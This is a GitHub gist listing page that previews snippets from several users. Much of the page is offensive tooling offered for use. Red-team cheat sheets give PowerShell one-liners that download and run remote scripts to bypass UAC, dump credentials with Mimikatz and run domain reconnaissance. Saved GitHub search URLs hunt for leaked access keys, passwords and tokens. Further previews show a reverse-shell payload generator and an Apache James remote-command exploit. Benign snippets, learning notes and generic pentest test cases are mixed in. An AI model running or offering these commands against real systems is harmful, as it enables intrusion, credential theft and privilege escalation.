Skip to content

Instantly share code, notes, and snippets.

View epicn1337's full-sized avatar
💭
Mountain Mover

p3rzv41 epicn1337

💭
Mountain Mover
4 followers · 15 following
View GitHub Profile
@JoyGhoshs
JoyGhoshs / shodan-dorks.txt
Created October 2, 2021 14:06
hostname:target.com | to find all asset available for target.com on shodan
http.title:"title" | to find server/host with similer title
http.html:"/file" | to find server/host with similar path
html:"context" | to find server/host with similar string
server: "apache 2.2.3" | to find server/host with same server
port:80 | to find server/host with same port
os:"windows" | to find server/host with same os
asn:AS3214 | to find host/server with matched asn
http.status:200 | to find server/host with 200 http response code
http.favicon.hash:"hash" | to find server/host with same favico hash
@vsec7
vsec7 / BurpSuiteSSLPassTrough.json
Created June 25, 2020 11:43
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},
@nullenc0de
nullenc0de / auto_git_query
Last active June 23, 2024 21:16
Automated Github Queries (Can open 29 tabs at a time)
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active May 21, 2024 08:42
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@sudomain
sudomain / LHTL notes
Last active December 13, 2023 16:48
Notes from Learning How to Learn MOOC
*Original intruction material by Dr. Barbara Oakley and Dr. Terrence Sejnowski as part of their MOOC "Learning How to Learn" available via Coursera (August 2017)
*Notes by Amir Saleh (not me) who shared his notes accessible via the discussion forums (https://docs.google.com/document/d/1GVYaVOVT2G9MS6ku6tLjhvoMazh7rWdqUu0Kts5C3Fc/edit)
*Reproduced per the paraphrasing rule outlined in the course FAQ:
*"We're often asked whether it's okay to use illustrations or quoted material from the course or book in your final project. It's perfectly possible to use illustrations from the course or book, but please cite where you got them, with the copyright information. If you quote anything from the video clips or the book A Mind for Numbers, you'll put it in quotation marks and cite where you got it. If you paraphrase information from the video clips or A Mind for Numbers--that is, you put things in your own words--then there's no need to put in a reference, although it would be nice to put some sort of general referenc
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 28, 2024 00:59
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@numberwhun
numberwhun / Penetration testing sample test cases
Created July 2, 2016 03:21
Penetration testing sample test cases
Penetration testing sample test cases (test scenarios):
Remember this is not functional testing. In Pentest your goal is to find security holes in the system. Below are some generic test cases and not necessarily applicable for all applications.
1) Check if web application is able to identify spam attacks on contact forms used in the website.
2) Proxy server – Check if network traffic is monitored by proxy appliances. Proxy server make it difficult for hackers to get internal details of the network thus protecting the system from external attacks.
3) Spam email filters – Verify if incoming and outgoing email traffic is filtered and unsolicited emails are blocked. Many email clients come with in-build spam filters which needs to be configured as per your needs. These configuration rules can be applied on email headers, subject or body.
4) Firewall – Make sure entire network or computers are protected with Firewall. Firewall can be a software or hardware to block unauthorized access to system. Firewall can p
@kjiwa
kjiwa / apache-james-exploit.py
Last active December 8, 2022 08:50
An exploit for Apache James 2.3.2 that executes remote commands. https://crimsonglow.ca/~kjiwa/2016/06/exploiting-apache-james-2.3.2.html
"""An exploit for Apache James 2.3.2 that executes remote commands.
This script creates a new user and enqueues a payload to be executed the next
time a user logs in to the machine. The vulnerability is documented in
CVE-2015-7611.
For more details, see http://www.securityfocus.com/bid/76933 and
https://www.exploit-db.com/exploits/35513/.
"""